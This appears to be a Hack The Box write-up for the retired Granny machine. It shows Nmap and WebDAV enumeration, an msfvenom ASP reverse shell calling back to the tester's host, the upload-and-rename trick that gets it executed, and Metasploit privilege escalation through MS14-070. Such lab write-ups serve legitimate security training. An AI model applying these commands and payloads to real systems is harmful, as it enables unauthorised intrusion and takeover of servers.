This is a writeup for the retired Hack The Box Granny machine.
- Hack The Box Machine address
- Machine IP: 10.10.10.15
Solution summary
To solve the machine, run through the following 3 steps:
- Exploit WebDAV vulnerability CVE-2017-7269 in outdated Microsoft IIS version 6.0.
- Upload
.asppayload using WebDAV vulnerability and launch a user reverse shell. - Escalate to root shell with Metasploit by exploiting an unpatched Windows installation with the CVE-2014-4076 TCP/IP Input Output Control (IOCTL) vulnerability.
Solution
Nmap
First, run Nmap to see which services are running on this machine.
nmap -oX machines/granny/nmap.xml -sV -A -sC 10.10.10.15
This is what you should see when Nmap finishes running:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-07 09:29 JST
Nmap scan report for 10.10.10.15
Host is up (0.089s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Date: Sat, 07 Sep 2024 00:19:22 GMT
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.73 seconds
Findings:
- Runs Windows
- Old version of Microsoft IIS (6.0)
- WebDAV available on this server, CVE-2017-7269 exploitable
Root page of http://10.10.10.1
Open in new tab
(full image size 42 KiB)
WebDAV
Use davtest to test for arbitrary WebDAV
file uploads using the following command:
davtest.pl -url http://10.10.10.15
davtest should output the following, suggesting that you can indeed upload
your own files.
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: tmBBHB93Jv8eP5
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5
********************************************************
Sending test files
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jhtml
PUT html SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.cfm
PUT php SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.php
PUT asp FAIL
PUT shtml FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.pl
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jsp
PUT aspx FAIL
PUT cgi FAIL
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
********************************************************
Checking for test file execution
EXEC jhtml FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
EXEC cfm FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC jsp FAIL
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
********************************************************
/etc/profiles/per-user/justusperlwitz/bin/davtest.pl Summary:
Created: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jhtml
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.cfm
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.php
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.pl
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jsp
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
Executes: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
Executes: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
List the files that you’ve just uploaded using the cadaver utility:
echo "ls" | cadaver http://10.10.10.15
dav:/> ls
Listing collection `/': succeeded.
Coll: DavTestDir_tmBBHB93Jv8eP5 0 Sep 7 09:26
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_log 0 Apr 12 2017
Coll: _vti_pvt 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: _vti_txt 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
iisstart.htm 1433 Feb 22 2003
pagerror.gif 2806 Feb 22 2003
postinfo.html 2440 Apr 12 2017
Creating and uploading a reverse shell payload
It’s time to get out the big (Metasploit) guns, and make yourself a nice ASP reverse shell.
Set up socat to listen on TCP port 4444 on your machine by running
the following command in your shell:
socat -d TCP4-LISTEN:4444 STDIO
Then, create a non-Meterpreter reverse shell using msfvenom by running
the following command in your shell:
# This payload does not rely on meterpreter
msfvenom -p windows/shell_reverse_tcp \
--platform windows \
--arch x86 \
RHOST=10.10.10.15 \
LHOST="10.10.16.2" \
LPORT=4444 -f asp \
> machines/granny/msfvenom_shell.asp
Then, using davtest.pl and cadaver, upload the shell as shell.html and
rename it to shell.asp. You can use the following two commands to achieve
this:
davtest.pl -url http://10.10.10.15 \
-uploadfile machines/granny/msfvenom_shell.asp \
-uploadloc 'shell.html'
echo "move shell.html shell.asp" | cadaver http://10.10.10.15
Now, trigger the RCE by launching the reverse shell that you have just uploaded and renamed.
Use the following curl invocation to launch the reverse shell:
curl -v "http://10.10.10.15/shell.asp"
Host enumeration
The reverse shell should connect to socat successfully at this point. This
section shows some common commands that you can run to get a better overview
over what accounts and services are on this machine.
First, find out who you’re logged in as using whoami like so:
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
Your user is just network service, so you can’t yet read out the administrator flag.
Find all users and groups on the machine by running net users:
c:\windows\system32\inetsrv>net users
User accounts for \\GRANNY
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_GRANPA IWAM_GRANPA Lakis
SUPPORT_388945a0
The command completed successfully.
The user Lakis looks interesting. Print the groups that Lakis belongs to
using net localgroup like so:
c:\windows\system32\inetsrv>net localgroup
Aliases for \\GRANNY
-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Distributed COM Users
*Guests
*HelpServicesGroup
*IIS_WPG
*Network Configuration Operators
*OWS_209498277_admin
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users
The command completed successfully.
Inspect the users IWAM_GRANPA and LAKIS using net user like so:
c:\windows\system32\inetsrv>net user IWAM_GRANPA
User name IWAM_GRANPA
Full Name Launch IIS Process Account
Comment Built-in account for Internet Information Services to start out of process applications
User's comment Built-in account for Internet Information Services to start out of process applications
Country code 000 (System Default)
Account active Yes
[...]
Local Group Memberships *IIS_WPG
Global Group memberships *None
[...]
c:\windows\system32\inetsrv>net user LAKIS
User name Lakis
Full Name Papalakis
Comment
User's comment
Country code 000 (System Default)
Account active Yes
[...]
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
To see open ports on the machine, run netstat -ano. You should see the following
output:
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:1027 0.0.0.0:0 LISTENING 404
TCP 0.0.0.0:5859 0.0.0.0:0 LISTENING 4
TCP 10.10.10.15:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.15:1037 10.10.16.2:4444 ESTABLISHED 3900
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING 1936
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 404
UDP 0.0.0.0:1026 *:* 732
UDP 0.0.0.0:4500 *:* 404
UDP 10.10.10.15:123 *:* 768
UDP 10.10.10.15:137 *:* 4
UDP 10.10.10.15:138 *:* 4
UDP 127.0.0.1:123 *:* 768
UDP 127.0.0.1:1029 *:* 768
Dump all firewall info using firewall show config:
c:\windows\system32\inetsrv>netsh firewall show config
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Disable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
80 TCP Enable IIS
ICMP configuration for Standard profile:
Mode Type Description
-------------------------------------------------------------------
Enable 8 Allow inbound echo request
Log configuration:
-------------------------------------------------------------------
File location = C:\WINDOWS\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
Access is denied.
Review all network interface information using ipconfig /all, route print and arp -A:
c:\windows\system32\inetsrv>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : granny
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-A9-25
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10.10.10.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
DNS Servers . . . . . . . . . . . : 10.10.10.2
c:\windows\system32\inetsrv>route print
route print
IPv4 Route Table
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x10003 ...00 50 56 b9 a9 25 ...... Intel(R) PRO/1000 MT Network Connection
===========================================================================
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.10.10.2 10.10.10.15 10
10.10.10.0 255.255.255.0 10.10.10.15 10.10.10.15 10
10.10.10.15 255.255.255.255 127.0.0.1 127.0.0.1 10
10.255.255.255 255.255.255.255 10.10.10.15 10.10.10.15 10
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
224.0.0.0 240.0.0.0 10.10.10.15 10.10.10.15 10
255.255.255.255 255.255.255.255 10.10.10.15 10.10.10.15 1
Default Gateway: 10.10.10.2
===========================================================================
Persistent Routes:
None
c:\windows\system32\inetsrv>arp -A
arp -A
Interface: 10.10.10.15 --- 0x10003
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-cc-3b dynamic
Using Meterpreter
Privilege escalation on Windows machines can be boring sometimes.
You deserve a break, use Meterpreter to finish this machine. Run the following
commands inside msfconsole in your terminal:
# msfconsole
set RHOSTS 10.10.10.15
set LHOST 10.10.16.2
set LPORT 4444
use exploit/windows/iis/iis_webdav_upload_asp
run
# inside meterpreter, run
# > background
# We're in yay
# but getsystem don't do nothing
Metasploit is convenient. I don’t even have to pretend that I know how to hack Windows systems anymore:
use post/multi/recon/local_exploit_suggester
set SESSION 1
exploit
# Kaboom
After Metasploit finishes searching for vulnerabilities, you should see the following exploit candidates:
exploit/windows/local/ms10_015_kitrap0d
The service is running, but could not be validated.
exploit/windows/local/ms14_058_track_popup_menu
The target appears to be vulnerable.
exploit/windows/local/ms14_070_tcpip_ioctl
The target appears to be vulnerable.
exploit/windows/local/ms15_051_client_copy_image
The target appears to be vulnerable.
exploit/windows/local/ms16_016_webdav
The service is running, but could not be validated.
exploit/windows/local/ppr_flatten_rec
The target appears to be vulnerable.
Try a few of these exploits. For this writeup, the TCP IOCTL exploit worked well.
# First, we migrate to another user process, w3wp.exe
# (whatever that means, might as well just say zoom and enhance)
# migrate 3728
use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 1
exploit
sessions -i 2
Find the flags by going through the user directories:
meterpreter > dir "C:/Documents and Settings"
Listing: C:/Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-04-13 03:48:10 +0900 Administrator
040777/rwxrwxrwx 0 dir 2017-04-12 23:03:34 +0900 All Users
040777/rwxrwxrwx 0 dir 2017-04-12 23:04:48 +0900 Default User
040777/rwxrwxrwx 0 dir 2017-04-13 04:19:46 +0900 Lakis
040777/rwxrwxrwx 0 dir 2017-04-12 23:08:32 +0900 LocalService
040777/rwxrwxrwx 0 dir 2017-04-12 23:08:31 +0900 NetworkService
[...]
meterpreter > dir "C:/Documents and Settings/Lakis/Desktop"
Listing: C:/Documents and Settings/Lakis/Desktop
================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-04-13 04:20:07 +0900 user.txt
meterpreter > cat "C:/Documents and Settings/Lakis/Desktop/user.txt"
[...]
meterpreter > dir "C:/Documents and Settings/Administrator/Desktop"
Listing: C:/Documents and Settings/Administrator/Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-04-13 04:17:07 +0900 root.txt
meterpreter > cat "C:/Documents and Settings/Administrator/Desktop/root.txt"
[...]
The flags are:
- User flag:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX - Root flag:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX